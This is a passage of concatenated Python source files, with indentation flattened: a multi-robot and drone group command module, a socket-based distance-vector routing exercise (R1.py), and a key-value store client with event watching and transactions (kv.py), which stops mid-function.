thread_dict[robot_id] = exec_cmd_thread
second_time = time.time()
# start threads
for robot_id, thread_obj in thread_dict.items():
thread_obj.start()
logger.debug("send command start spend time {0}".format(time.time() - second_time))
for robot_id, exec_cmd_thread in thread_dict.items():
exec_cmd_thread.join()
result_dict[robot_id] = exec_cmd_thread.get_result()
spend_time = time.time() - start_time
logger.debug("send command spend time {0}".format(spend_time))
logger.debug("RobotGroupBase: execute_command, result {0}".format(result_dict))
return result_dict
def get_sn(self):
""" 获取组内机器的sn编号
:param args:
:return: dict: {robot_id: SN, ... }储存机器sn编号的字典,字典的键为机器的编号,值为对应的机器的sn号码
"""
return self.execute_command('get_sn')
class RMGroup(RobotGroupBase):
def __init__(self, robots_group_list, all_robots_dict):
super().__init__(robots_group_list, all_robots_dict)
def _scan_group_module(self):
_chassis = multi_module.MultiRmModule(self, 'Chassis')
_gimbal = multi_module.MultiRmModule(self, 'Gimbal')
_blaster = multi_module.MultiRmModule(self, 'Blaster')
_led = multi_module.MultiRmModule(self, 'Led')
_robotic_arm = multi_module.MultiRmModule(self, 'RoboticArm')
_gripper = multi_module.MultiRmModule(self, 'Gripper')
self._group_modules_dict[_chassis.name] = _chassis
self._group_modules_dict[_gimbal.name] = _gimbal
self._group_modules_dict[_blaster.name] = _blaster
self._group_modules_dict[_led.name] = _led
self._group_modules_dict[_robotic_arm.name] = _robotic_arm
self._group_modules_dict[_gripper.name] = _gripper
def set_group_robots_mode(self, mode="free"):
all_result = True
for robot_id in self._robots_id_in_group_list:
result = self._all_robots_dict[robot_id].set_robot_mode(mode)
all_result = result and all_result
if not result:
logger.error(
"RobotGroup: set group_robots_mode {0}, robot id {1} set mode error!".format(mode, robot_id))
else:
logger.info(
"RobotGroup: set group_robots_mode {0}, robot id {1} set mode successfully!".format(mode, robot_id))
if all_result:
logger.info(
"RobotGroup: set_group_robots_mode {1}, group {0} set successfully".format(
self._robots_id_in_group_list, mode))
else:
logger.info(
"RobotGroup: set_group_robots_mode {1}, group {0} set error".format(
self._robots_id_in_group_list, mode))
return all_result
def play_sound(self, sound_id, times=1):
"""
robots in group play sound
:param sound_id:
:return:
"""
final_result = True  # and-accumulator: any robot that fails flips this to False
for robot_id in self._robots_id_in_group_list:
result = self._all_robots_dict[robot_id].play_sound(
sound_id, times)
if not result:
logger.warning("RobotGroup: Robot id {0} play_sound failed".format(robot_id))
final_result = final_result and result
return final_result
@property
def chassis(self):
""" Get chassis obj """
return self.get_group_module("Chassis")
@property
def gimbal(self):
""" Get gimbal obj """
return self.get_group_module("Gimbal")
@property
def blaster(self):
""" Get blaster obj """
return self.get_group_module("Blaster")
@property
def led(self):
""" Get led obj """
return self.get_group_module("Led")
@property
def robotic_arm(self):
""" Get arm obj """
return self.get_group_module("RoboticArm")
@property
def sensor(self):
""" Get sensor obj"""
return self.get_group_module("DistanceSensor")
@property
def gripper(self):
""" Get gripper obj """
return self.get_group_module("Gripper")
class SingleDroneInGroup(multi_module.TelloAction):
def __init__(self, client, _robot_id, _robot_sn, _robot_host):
self._client = client
self._robot_id = _robot_id
self._robot_sn = _robot_sn
self._robot_host = _robot_host
self.event = threading.Event()
self.robot_group_host_list = []
self.event.set()
self._dispatcher = multi_module.TelloDispatcher(self._client, self.event, {self._robot_host: self._robot_id})
self._dispatcher.action_host_list = [self._robot_host]
def close(self):
pass
def send_command(self, command):
self.event.wait(10)
if self.event.isSet():
logger.info("execute command:{}".format(command))
proto = tool.TelloProtocol(command, self._robot_host)
self._client.send(proto)
self.event.clear()
else:
self.event.set()
logger.warning("execute command:{}, timeout".format(command))
class TelloGroup(RobotGroupBase):
def __init__(self, client, robot_id_group_list, _robot_id_dict={}, _robot_host_dict={}):
super().__init__(robot_id_group_list, _robot_id_dict)
self._robot_host_dict = _robot_host_dict
self._robot_group_host_list = []
self.init()
self.client = client
def init(self):
for robot_id in self._robots_id_in_group_list:
sn = self._all_robots_dict[robot_id]
host = self._robot_host_dict[sn]
self._robot_group_host_list.append(host)
def get_sn(self):
""" find sn in group"""
return [self._all_robots_dict[robot_id] for robot_id in self._robots_id_in_group_list]
@property
def robot_group_host_list(self):
return self._robot_group_host_list
def get_robot(self, robot_id):
""" get Drone obj """
robot_sn = self._all_robots_dict[robot_id]
robot_host = self._robot_host_dict[robot_sn]
logger.info('get robot:SN:{}, HOST:{}' .format(robot_sn, robot_host))
return SingleDroneInGroup(self.client, robot_id, robot_sn, robot_host)
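# Hedged usage sketch (the wiring is normally done by a MultiRobot-style
# manager; 'client', the SNs, and the host values are all hypothetical):
#
#   group = TelloGroup(client, [0, 1],
#                      _robot_id_dict={0: 'SN0', 1: 'SN1'},
#                      _robot_host_dict={'SN0': '192.168.0.10',
#                                        'SN1': '192.168.0.11'})
#   group.get_sn()                              # -> ['SN0', 'SN1']
#   group.get_robot(0).send_command('command')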
|
R1.py
|
import socket
import threading
import time
import sys
# Define constant parameters
ALL_CONN = [8080,8181,8282,8383]
SERVER_PORT = 8080
IP_ADDR = "127.0.10.1"
ADDR = (IP_ADDR,SERVER_PORT)
CLIENT_ADDR = list(IP_ADDR)
CLIENT_ADDR[-1] = str(int(CLIENT_ADDR[-1]) + 1)
CLIENT_ADDR = "".join(CLIENT_ADDR)
CONFIG_PATH = "config.txt"
NODE_NUM = 1
PING_MSG = "abcdef"
PACKET_SIZE = 1024
FORMAT = "utf-8"
FACTOR = 10e3
UPPER_BOUND = 10e7
# define global variables
server = socket.socket()
client_sockets = []
client = [None] * 4  # placeholders; the real sockets are created in createClient()
client_addrs = []
# Initialize global router table
rt = [['nil', -1, 'nil'] for _ in range(4)]  # independent rows, not four aliases of one list
rt[NODE_NUM-1] = [str('R'+str(NODE_NUM)),0,str('R'+str(NODE_NUM))]
latencies = [0.0] * 4
# getTopology() - gets the connection details of the nodes in the network
def getTopology():
# Open file
file = open(CONFIG_PATH,"r")
connections = []
# read the topology details line by line
line = file.readline()
while line:
# Get list of words in the line
words = line.strip().split(" ")
# Get ip and port details
ip_1,port_1 = words[0].split(":")
ip_2,port_2 = words[1].split(":")
# Update connection details
if(ip_1 == IP_ADDR):
connections.append([ip_2,port_2])
elif(ip_2 == IP_ADDR):
connections.append([ip_1,port_1])
line = file.readline()
return connections
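# Illustrative config.txt line (format inferred from the parsing above:
# "<ip>:<port> <ip>:<port>" per line; the addresses are hypothetical):
#   127.0.10.1:8080 127.0.10.2:8181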
# Define function to setup server
def setupServer(connections):
global server
global client_sockets
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind(ADDR)
server.listen()
print(f"[LISTENING Server is listening on {IP_ADDR}]")
time.sleep(5)
for i in range(0,len(connections)):
client_conn,cli_addr = server.accept()
client_sockets.append([cli_addr,client_conn])
print(f"[NEW CONNECTION] {cli_addr} connected.")
# Define the function to create client that connects with all nodes specified in the topology
def createClient(connections):
global client
global CLIENT_ADDR
i = 0
for conn in connections:
addr = (conn[0],int(conn[1]))
client[i] = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
client[i].bind((CLIENT_ADDR,SERVER_PORT))
client[i].connect(addr)
CLIENT_ADDR = list(CLIENT_ADDR)
CLIENT_ADDR[-1] = str(int(CLIENT_ADDR[-1]) + 1)
CLIENT_ADDR = "".join(CLIENT_ADDR)
i = i + 1
# Let us define the listenToPing() function that responds to incoming pings
def listenToPing(conn):
msg = conn.recv(1024)
conn.send(msg)
# Runner thread to exchange latency contribution of current node to all requesting nodes
def exchangeLatency(conn, lat_str):
msg = conn.recv(1024).decode(FORMAT)
if(msg == "EXCHG"):
conn.send(lat_str.encode(FORMAT))
# Function to update the routing table based on latency costs from neighbors, using Bellman-Ford
def updateRT(index,lat_str):
latency = lat_str.strip().split(",")
latency = list(map(float,latency))
cost_x = rt[index][1]
for i in range(0,4):
updated_cost = cost_x + latency[i]
if(rt[i][1] > updated_cost): # update based on min cost
rt[i][1] = updated_cost
rt[i][2] = str("R"+str(index+1))
# Given the current hop and destination find the next hop by calling the appropriate server
def getNextHop(curr_hop,dest,conn):
# First send request to node
request_msg = str(dest)
# time.sleep(2)
conn.send(request_msg.encode(FORMAT))
# Get next hop from node
next_hop = conn.recv(1024).decode(FORMAT)
next_hop = next_hop.strip().split(",")
return next_hop
# runner function to handle next hop requests
def nextHop(conn):
# global client_addrs
# global client_sockets
while(1):
req_msg = conn.recv(1024).decode(FORMAT)
dest = int(req_msg)
# Get next hop
next_hop = rt[dest][2]
# print("sada",next_hop)
if(int(next_hop[1]) != dest+1):
next_conn = client_sockets[client_addrs.index(int(ALL_CONN[int(rt[dest][2][-1]) - 1]))][1]
next_conn.send(str(dest).encode(FORMAT))
next_hop = next_hop + "," + next_conn.recv(1024).decode(FORMAT)
conn.send(next_hop.encode(FORMAT))
def main():
# STEP-1: First let us obtain the topology details from the config.txt file
connections = []
connections = getTopology()
num_connections = len(connections)
print("[NETWORK TOPOLOGY] Number of connections =",len(connections))
for conn in connections:
print("[NETWORK TOPOLOGY] ",IP_ADDR," --> ",conn[0],":",conn[1],sep ="")
# STEP-2: Now that we have the server client details let us create server and client in threads
thread = [0] * 2
thread[0] = threading.Thread(target = setupServer,args = [connections])
thread[0].start()
time.sleep(5)
thread[1] = threading.Thread(target = createClient,args = [connections])
thread[1].start()
# Join both the threads
thread[0].join()
thread[1].join()
# Sleep for 2 seconds to ensure the topology is constructed for all nodes
time.sleep(2)
# Find the latencies of the connections - RTT for a std message
curr_connected = [int(conn[1]) for conn in connections]
# First let us fill in max value for connections not connected to current node
for indx in range(0,len(ALL_CONN)):
if(int(ALL_CONN[indx]) not in curr_connected):
latencies[indx] = UPPER_BOUND
latencies[NODE_NUM - 1] = 0
# STEP-3: Now let us find the RTT of nodes connected to current node
# Setup all the clients in separate threads to respond to any incoming pings
ping_threads = [0] * num_connections
for i in range(0,num_connections):
ping_threads[i] = threading.Thread(target = listenToPing, args = [client[i]])
ping_threads[i].start()
print("[NETWORK TOPOLOGY] Pinging all connected nodes ...")
# Make the server ping all connections
for item in client_sockets:
conn = item[1]
start = time.time()
conn.send(PING_MSG.encode(FORMAT))
ret_msg = conn.recv(1024)
end = time.time()
latencies[ALL_CONN.index(int(item[0][1]))] = (end - start) * FACTOR
# Join all ping threads
for i in range(0,num_connections):
ping_threads[i].join()
print("[NETWORK TOPOLOGY] Latencies:",latencies)
# STEP-4: Init the routing table
print("\n[DVR] Initial Routing Table is:")
print("%-20s %-25s %-20s" %("Destination","Cost (Latency)","Next Hop"))
for indx in range(0,4):
rt[indx] = [str('R'+str(indx+1)),latencies[indx],str('R'+str(indx+1))]
print("%-20s %-25s %-20s" %(rt[indx][0],rt[indx][1],rt[indx][2]))
# STEP-5: Update routing table - For 3 iterations
for loop in range(0,3):
print("\n******************* ITERATION -",loop+1,": ************************")
# First let us setup the string to be passed from R1 (comma separated latencies)
latency_str = ",".join([str(lat[1]) for lat in rt])
# Iterate over all nodes and request if connected
print("\n[DVR] Exchanging Routing Information ...")
for indx in range(0,4):
if indx == NODE_NUM-1:
continue
elif ALL_CONN[indx] not in curr_connected:
print("[DVR]",rt[NODE_NUM-1][0],"is not connected to",rt[indx][0])
# Setup threads to exchange the latency contributions of the current node to requesting clients
latency_threads = [0] * num_connections
for i in range(0,num_connections):
latency_threads[i] = threading.Thread(target = exchangeLatency, args = [client[i],latency_str])
latency_threads[i].start()
request_msg = "EXCHG"
received_lat_str = ["0,0,0,0"]*4
i = 0
for item in client_sockets:
conn = item[1]
conn.send(request_msg.encode(FORMAT))
received_lat_str[ALL_CONN.index(int(item[0][1]))] = conn.recv(1024).decode(FORMAT)
for i in range(0,num_connections):
latency_threads[i].join()
print("[DVR] Received routing information is:")
print(received_lat_str)
# Update the routing table based on the received latencies - Bellman-Ford is used here
for indx in range(0,4):
if(received_lat_str[indx] != "0,0,0,0"):
updateRT(indx,received_lat_str[indx])
print("\n[DVR] Routing Table after iteration -",loop+1,"is: ")
print("%-20s %-25s %-20s" %("Destination","Cost (Latency)","Next Hop"))
for indx in range(0,4):
print("%-20s %-25s %-20s" %(rt[indx][0],rt[indx][1],rt[indx][2]))
# Print the route for each current src - destination pair
global client_addrs
client_addrs = [int(item[0][1]) for item in client_sockets]
# First set up the threads that'll respond to requests from any connection, if any (regarding next hops)
hop_threads = [0] * num_connections
for i in range(0,num_connections):
hop_threads[i] = threading.Thread(target = nextHop, args = [client[i]])
hop_threads[i].start()
# Iterate over each destination and find the route by requesting appropriate clients for the next hop
hop_list = [rt[NODE_NUM-1][0]]
print("\n[DVR] Printing routing information")
for i in range(0,4):
if i != NODE_NUM - 1:
dest = rt[i][0]
next_hop = rt[i][2]
hop_list.append(next_hop)
while(dest not in hop_list):
conn = client_sockets[client_addrs.index(ALL_CONN[int(rt[i][2][-1]) - 1])][1]
next_hop = getNextHop(int(next_hop[-1])-1,i,conn)
hop_list.extend(next_hop)
print(*hop_list, sep=' -> ')
hop_list = [rt[NODE_NUM-1][0]]
# Sleep 5 seconds and then close all hop_threads
time.sleep(5)
if __name__ == '__main__':
main()
|
kv.py
|
import textwrap as _textwrap
import threading as _threading
import weakref as _weakref
from collections import (namedtuple as _namedtuple,
deque as _deque,
OrderedDict as _OrderedDict)
from collections.abc import (Mapping as _Mapping,
MutableMapping as _MutableMapping)
from functools import wraps as _wraps
from queue import Queue as _Queue
import grpc as _grpc
from . import proto as _proto
from .exceptions import (ApplicationError as _ApplicationError,
ConnectionError as _ConnectionError)
from .model import (
container_instance_from_string as _container_instance_from_string,
container_instance_to_string as _container_instance_to_string)
from .objects import (Base as _Base,
Enum as _Enum,
no_change as _no_change)
__all__ = ('KeyValueStore',
'ValueOwnerPair',
'TransactionResult',
'Condition', 'is_condition',
'Operation', 'is_operation',
'value', 'owner', 'comparison',
'count', 'list_keys',
'exists', 'missing',
'get', 'get_prefix', 'get_range',
'pop', 'pop_prefix', 'pop_range',
'discard', 'discard_prefix', 'discard_range',
'put', 'swap',
'EventType', 'Event', 'EventFilter', 'EventQueue')
class Operation(_Base):
"""Base class for all key-value store operations"""
__slots__ = ()
def _build_operation(self):
raise NotImplementedError # pragma: no cover
def _build_result(self, result):
raise NotImplementedError # pragma: no cover
class Condition(_Base):
"""Base class for all key-value store conditional expressions"""
__slots__ = ()
def _build_condition(self):
raise NotImplementedError # pragma: no cover
def is_operation(obj):
"""Return if ``obj`` is a valid skein key-value store operation"""
return isinstance(obj, Operation)
def is_condition(obj):
"""Return if ``x`` is a valid skein key-value store condition"""
return isinstance(obj, Condition)
class EventType(_Enum):
"""Event types to listen on.
Attributes
----------
ALL : EventType
All events.
PUT : EventType
Only ``PUT`` events.
DELETE : EventType
Only ``DELETE`` events.
"""
_values = ('ALL', 'PUT', 'DELETE')
class EventFilter(object):
"""An event filter.
Specifies a subset of events to watch for. May specify one of ``key``,
``prefix``, or ``start``/``end``. If no parameters are
provided, selects all events.
Parameters
----------
key : str, optional
If present, only events from this key will be selected.
prefix : str, optional
If present, only events with this key prefix will be selected.
start : str, optional
If present, specifies the lower bound of the key range, inclusive.
end : str, optional
If present, specifies the upper bound of the key range, exclusive.
event_type : EventType, optional.
The type of event. Default is ``'ALL'``
"""
__slots__ = ('_start', '_end', '_event_type')
def __init__(self, key=None, prefix=None, start=None,
end=None, event_type=None):
has_key = key is not None
has_prefix = prefix is not None
has_range = start is not None or end is not None
if (has_key + has_prefix + has_range) > 1:
raise ValueError("Must specify at most one of `key`, `prefix`, or "
"`start`/`end`")
if has_key:
if not isinstance(key, str):
raise TypeError("key must be a string")
start = key
end = key + '\x00'
elif has_prefix:
if not isinstance(prefix, str):
raise TypeError("prefix must be a string")
start = prefix
end = _next_key(prefix)
else:
if not (start is None or isinstance(start, str)):
raise TypeError("start must be a string or None")
if not (end is None or isinstance(end, str)):
raise TypeError("end must be a string or None")
event_type = (EventType.ALL if event_type is None
else EventType(event_type))
self._start = start
self._end = end
self._event_type = event_type
start = property(lambda s: s._start)
end = property(lambda s: s._end)
event_type = property(lambda s: s._event_type)
def __repr__(self):
return ('EventFilter(start=%r, end=%r, event_type=%r)'
% (self._start, self._end, self._event_type))
def __reduce__(self):
return (EventFilter, (None, None, self.start,
self.end, self.event_type))
def __eq__(self, other):
return (type(self) is type(other) and
self.start == other.start and
self.end == other.end and
self.event_type == other.event_type)
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash((self._start, self._end, self._event_type))
class Event(_namedtuple('Event',
['key', 'result', 'event_type', 'event_filter'])):
"""An event in the key-value store.
Parameters
----------
key : str
The key affected.
result : ValueOwnerPair or None
The value and owner for the key. None if a ``'DELETE'`` event.
event_type : EventType
The type of event.
event_filter : EventFilter
The event filter that generated the event.
"""
pass
class TransactionResult(_namedtuple('TransactionResult',
['succeeded', 'results'])):
"""A result from a key-value store transaction.
Parameters
----------
succeeded : bool
Whether the transaction conditions evaluated to True.
results : sequence
A sequence of results from applying all operations in the transaction
``on_success`` or ``on_failure`` parameters, depending on whether the
conditions evaluated to True or False.
"""
pass
class ValueOwnerPair(_namedtuple('ValueOwnerPair', ['value', 'owner'])):
"""A (value, owner) pair in the key-value store.
Parameters
----------
value : bytes
The value.
owner : str or None
The owner container_id, or None for no owner.
"""
pass
def _value_owner_pair(kv):
"""Build a ValueOwnerPair from a KeyValue object"""
return ValueOwnerPair(kv.value, (_container_instance_to_string(kv.owner)
if kv.HasField("owner") else None))
class EventQueue(object):
"""A queue of events on the key-value store.
Besides the normal ``Queue`` interface, also supports iteration.
>>> for event in app.kv.events(prefix='bar'):
... print(event)
If an event falls into multiple selected filters, it will be placed in the
event queue once for each filter. For example, ``prefix='bar'`` and
``key='bart'`` would both receive events on ``key='bart'``. If a queue was
subscribed to both events, changes to this key would be placed in the queue
twice, once for each filter.
All events are unsubscribed when this object is collected. Can also be used
as a contextmanager to unsubscribe-all on ``__exit__``, or explicitly call
``unsubscribe_all``.
"""
def __init__(self, kv):
self._kv = kv
self.filters = set()
self._queue = _Queue()
self._exception = None
self._ref = _weakref.ref(self)
def __repr__(self):
return 'EventQueue<%d filters>' % len(self.filters)
def __iter__(self):
while True:
yield self.get()
def __enter__(self):
return self
def __exit__(self, *args):
self.unsubscribe_all()
def __del__(self):
self.unsubscribe_all()
def _build_event_filter(self, event_filter=None, **kwargs):
if event_filter is not None:
if any(v is not None for v in kwargs.values()):
raise ValueError("Cannot provide ``event_filter`` and "
"other arguments")
if not isinstance(event_filter, EventFilter):
raise TypeError("event_filter must be an EventFilter")
else:
event_filter = EventFilter(**kwargs)
return event_filter
@_wraps(_Queue.get)
def get(self, block=True, timeout=None):
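# Re-raise any previously seen stream error; once an exception is pulled
# from the queue it is sticky for every later get() call.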
if self._exception is not None:
raise self._exception
out = self._queue.get(block=block, timeout=timeout)
if isinstance(out, Exception):
self._exception = out
raise out
return out
@_wraps(_Queue.put)
def put(self, item, block=True, timeout=None):
self._queue.put(item, block=block, timeout=timeout)
def subscribe(self, event_filter=None, key=None, prefix=None,
start=None, end=None, event_type=None):
"""Subscribe to an event filter.
May provide either an explicit event filter, or provide arguments to
create a new one and add it to the queue. In either case, the event
filter is returned.
If no arguments are provided, subscribes to all events.
Parameters
----------
event_filter : EventFilter
An explicit EventFilter. If provided, no other keyword arguments
may be provided.
key : str, optional
If present, only events from this key will be selected.
prefix : str, optional
If present, only events with this key prefix will be selected.
start : str, optional
If present, specifies the lower bound of the key range, inclusive.
end : str, optional
If present, specifies the upper bound of the key range, exclusive.
event_type : EventType, optional.
The type of event. Default is ``'ALL'``.
Returns
-------
EventFilter
"""
event_filter = self._build_event_filter(event_filter=event_filter,
key=key,
prefix=prefix,
start=start,
end=end,
event_type=event_type)
if event_filter in self.filters:
return event_filter
self._kv._add_subscription(self, event_filter)
self.filters.add(event_filter)
return event_filter
def unsubscribe(self, event_filter=None, key=None, prefix=None,
start=None, end=None, event_type=None):
"""Unsubscribe from an event filter.
May provide either an explicit event filter, or provide arguments to
identify the filter to remove.
If no arguments are provided, unsubscribes from a filter of all events.
A ``ValueError`` is raised if the specified filter isn't currently
subscribed to.
Parameters
----------
event_filter : EventFilter
An explicit EventFilter. If provided, no other keyword arguments
may be provided.
key : str, optional
If present, only events from this key will be selected.
prefix : str, optional
If present, only events with this key prefix will be selected.
start : str, optional
If present, specifies the lower bound of the key range, inclusive.
end : str, optional
If present, specifies the upper bound of the key range, exclusive.
event_type : EventType, optional.
The type of event. Default is ``'ALL'``.
Returns
-------
EventFilter
"""
event_filter = self._build_event_filter(event_filter=event_filter,
key=key,
prefix=prefix,
start=start,
end=end,
event_type=event_type)
if event_filter not in self.filters:
raise ValueError("not currently subscribed to %r" % (event_filter,))
self._kv._remove_subscription(self, event_filter)
self.filters.discard(event_filter)
return event_filter
def unsubscribe_all(self):
"""Unsubscribe from all event filters"""
# make a copy while iterating
for filter in list(self.filters):
self.unsubscribe(filter)
class KeyValueStore(_MutableMapping):
"""The Skein Key-Value store.
Used by applications to coordinate configuration and global state.
"""
def __init__(self, client):
# The application client
self._client = client
# A lock to secure internal state
self._lock = _threading.Lock()
# Event listener thread is None initially
self._event_listener_started = False
def _ensure_event_listener(self):
with self._lock:
if not self._event_listener_started:
# A queue of input requests, used by the input iterator
self._input_queue = _Queue()
# A deque of event filters waiting to be paired with a watch_id
self._create_deque = _deque()
# Mapping of watch_id to EventFilter
self._id_to_filter = {}
# Mapping of EventFilter to watch_id
self._filter_to_id = {}
# Mapping of EventFilter to a set of EventQueue weakrefs
self._filter_to_queues = {}
# Mapping of EventFilter to threading.Event/True
self._filter_subscribed = {}
# The output from the watch stream, processed by the handler loop
self._output_iter = self._client._call('Watch', self._input_iter())
# A thread for managing outputs from the watch stream
self._event_listener = _threading.Thread(target=self._handler_loop)
self._event_listener.daemon = True
self._event_listener.start()
self._event_listener_started = True
def _handler_loop(self):
while True:
try:
resp = next(self._output_iter)
except _grpc.RpcError as _exc:
exc = _exc
else:
exc = None
if exc is not None:
# Stream errored (all exceptions are unexpected)
# Shutdown stream state and notify all event queues
exc = (_ConnectionError("Unable to connect to application")
if exc.code() == _grpc.StatusCode.UNAVAILABLE
else _ApplicationError(exc.details()))
self._input_queue.put((None, None))
with self._lock:
all_qs = set(q for qs in self._filter_to_queues.values()
for q in qs)
for eq_ref in all_qs:
try:
eq_ref().put(exc)
except AttributeError: # pragma: nocover
# reference dropped, but __del__ not yet run
# this is hard to test, so no coverage
pass
break
watch_id = resp.watch_id
if resp.type == _proto.WatchResponse.CREATE:
event_filter = self._create_deque.popleft()
with self._lock:
self._id_to_filter[watch_id] = event_filter
self._filter_to_id[event_filter] = watch_id
self._filter_subscribed[event_filter].set()
self._filter_subscribed[event_filter] = True
elif resp.type != _proto.WatchResponse.CANCEL:
event_type = EventType(_proto.WatchResponse.Type.Name(resp.type))
with self._lock:
event_filter = self._id_to_filter.get(watch_id)
if event_filter is not None:
for kv in resp.event:
event = Event(key=kv.key,
result=(_value_owner_pair(kv)
if event_type == EventType.PUT
else None),
event_filter=event_filter,
event_type=event_type)
for eq_ref in self._filter_to_queues[event_filter]:
try:
eq_ref().put(event)
except AttributeError: # pragma: nocover
# reference dropped, but __del__ not yet run
# this is hard to test, so no coverage
pass
def _input_iter(self):
while True:
req, event_filter = self._input_queue.get()
if req is None:
break # shutdown flag
elif event_filter is not None:
# Create request, enqueue the event filter for later
self._create_deque.append(event_filter)
yield req
def _add_subscription(self, event_queue, event_filter):
with self._lock:
eq_ref = event_queue._ref
if event_filter in self._filter_to_queues:
self._filter_to_queues[event_filter].add(eq_ref)
subscribed = self._filter_subscribed[event_filter]
if subscribed is True:
return
else:
self._filter_to_queues[event_filter] = {eq_ref}
subscribed = self._filter_subscribed[event_filter] = _threading.Event()
req = _proto.WatchCreateRequest(start=event_filter.start,
end=event_filter.end,
event_type=str(event_filter.event_type))
self._input_queue.put((_proto.WatchRequest(create=req), event_filter))
# Wait for subscription to occur
subscribed.wait()
def _remove_subscription(self, event_queue, event_filter):
with self._lock:
eq_ref = event_queue._ref
if event_filter in self._filter_to_queues:
self._filter_to_queues[event_filter].discard(eq_ref)
if not self._filter_to_queues[event_filter]:
# Last queue registered for this filter - issue cancel
watch_id = self._filter_to_id[event_filter]
req = _proto.WatchCancelRequest(watch_id=watch_id)
self._input_queue.put((_proto.WatchRequest(cancel=req), None))
# Cleanup state
del self._id_to_filter[watch_id]
del self._filter_to_id[event_filter]
del self._filter_to_queues[event_filter]
del self._filter_subscribed[event_filter]
def event_queue(self):
"""Create a new EventQueue subscribed to no events.
Examples
--------
Subscribe to events starting with ``'foo'`` or ``'bar'``.
>>> foo = skein.kv.EventFilter(prefix='foo')
>>> bar = skein.kv.EventFilter(prefix='bar')
>>> queue = app.kv.event_queue() # doctest: skip
>>> queue.subscribe(foo) # doctest: skip
>>> queue.subscribe(bar) # doctest: skip
>>> for event in queue: # doctest: skip
... if event.filter == foo:
... print("foo event")
... else:
... print("bar event")
"""
self._ensure_event_listener()
return EventQueue(self)
def events(self, event_filter=None, key=None, prefix=None,
start=None, end=None, event_type=None):
"""Shorthand for creating an EventQueue and adding a single filter.
May provide either an explicit event filter, or provide arguments to
create a new one and add it to the queue.
If no arguments are provided, creates a queue subscribed to all events.
Parameters
----------
event_filter : EventFilter
An explicit EventFilter. If provided, no other keyword arguments
may be provided.
key : str, optional
If present, only events from this key will be selected.
prefix : str, optional
If present, only events with this key prefix will be selected.
start : str, optional
If present, specifies the lower bound of the key range, inclusive.
end : str, optional
If present, specifies the upper bound of the key range, exclusive.
event_type : EventType, optional.
The type of event. Default is ``'ALL'``.
Returns
-------
EventQueue
Examples
--------
Subscribe to all events with prefix ``'foo'``:
>>> for event in app.kv.events(prefix='foo'): # doctest: skip
... if event.type == 'PUT':
... print("PUT<key=%r, value=%r>" % (event.key, event.value))
... else: # DELETE
... print("DELETE<key=%r>" % event.key)
PUT<key='foo', value=b'bar'>
PUT<key='food', value=b'biz'>
DELETE<key='food'>
PUT<key='foo', value=b'changed'>
"""
queue = self.event_queue()
queue.subscribe(event_filter=event_filter,
key=key,
prefix=prefix,
start=start,
end=end,
event_type=event_type)
return queue
def _apply_op(self, op, timeout=None):
req = op._build_operation()
resp = self._client._call(op._rpc, req, timeout=timeout)
return op._build_result(resp)
def __iter__(self):
return iter(self.list_keys())
def __len__(self):
return self.count()
def __setitem__(self, key, value):
self.put(key, value=value)
def __getitem__(self, key):
result = self.get(key)
if result is None:
raise KeyError(key)
return result
def __delitem__(self, key):
if not self.discard(key):
raise KeyError(key)
def __contains__(self, key):
return self.exists(key)
def wait(self, key, return_owner=False):
"""Get the value associated with a single key, blocking until the key
exists if not present.
Parameters
----------
key : str
The key to get.
return_owner : bool, optional
If True, the owner will also be returned along with the value. Default
is False.
Returns
-------
bytes or ValueOwnerPair
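Examples
--------
Block until ``'key'`` is set, then return its value (illustrative):
>>> app.kv.wait('key')  # doctest: skip
b'value'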
"""
with self.events(key=key, event_type='put') as event_queue:
# We `get` after creating an event queue to avoid the following
# race condition:
# - get fails to find key
# - key is created by different client
# - event queue is created, waiting for PUT events
res = self.get(key=key, return_owner=return_owner)
if ((return_owner and res.value is not None) or
(not return_owner and res is not None)):
return res
event = event_queue.get()
return event.result if return_owner else event.result.value
def clear(self):
self.discard_range()
def setdefault(self, key, default):
"""Get the value associated with key, setting it to default if
not present.
This transaction happens atomically on the key-value store.
Parameters
----------
key : str
The key
default : bytes
The default value to set if the key isn't present.
Returns
-------
value : bytes
"""
res = self.transaction(conditions=[exists(key)],
on_success=[get(key)],
on_failure=[put(key, default)])
return res.results[0] if res.succeeded else default
def update(self, *args, **kwargs):
"""Update the key-value store with multiple key-value pairs atomically.
Parameters
----------
arg : mapping or iterable, optional
Either a mapping or an iterable of ``(key, value)``.
**kwargs
Extra key-value pairs to set. Semantically these are applied after
any present in ``arg``, and will thus override any intersecting
keys between the two.
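Examples
--------
Set several keys in one atomic transaction (illustrative):
>>> app.kv.update({'a': b'1'}, b=b'2')  # doctest: skip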
"""
if len(args) > 1:
raise TypeError('update expected at most 1 argument, got %d' %
len(args))
if args:
other = args[0]
if isinstance(other, _Mapping):
ops = [put(k, v) for k, v in other.items()]
elif hasattr(other, "keys"):
ops = [put(k, other[k]) for k in other.keys()]
else:
ops = [put(k, v) for k, v in other]
else:
ops = []
ops.extend(put(k, v) for k, v in kwargs.items())
self.transaction(on_success=ops)
def transaction(self, conditions=None, on_success=None, on_failure=None):
"""An atomic transaction on the key-value store.
Parameters
----------
conditions : Condition or sequence of Conditions, optional
A sequence of conditions to evaluate together. The conditional
expression succeeds if all conditions evaluate to True, and fails
otherwise. If no conditions are provided the conditional expression
also succeeds.
on_success : Operation or sequence of Operation, optional
A sequence of operations to apply if all conditions evaluate to
True.
on_failure : Operation or sequence of Operation, optional
A sequence of operations to apply if any condition evaluates to
False.
Returns
-------
result : TransactionResult
A namedtuple of (succeeded, results), where results is a list of
results from either the ``on_success`` or ``on_failure``
operations, depending on which branch was evaluated.
Examples
--------
This implements an atomic `compare-and-swap
<https://en.wikipedia.org/wiki/Compare-and-swap>`_ operation, a useful
concurrency primitive. It sets ``key`` to ``new`` only if it currently
is ``prev``:
>>> from skein import kv
>>> def compare_and_swap(app, key, new, prev):
... result = app.kv.transaction(
... conditions=[kv.value(key) == prev], # if key == prev
... on_success=[kv.put(key, new)]) # then set key = new
... return result.succeeded
>>> app.kv['key'] = b'value' # doctest: skip
Since ``'key'`` currently is ``b'value'``, the conditional expression
succeeds and ``'key'`` is set to ``b'new_value'``
>>> compare_and_swap(app, 'key', b'new_value', b'value') # doctest: skip
True
Since ``'key'`` currently is ``b'value'`` and not ``b'wrong'``, the
conditional expression fails and ``'key'`` remains unchanged.
>>> compare_and_swap(app, 'key', b'another_value', b'wrong') # doctest: skip
False
"""
conditions = conditions or []
on_success = on_success or []
on_failure = on_failure or []
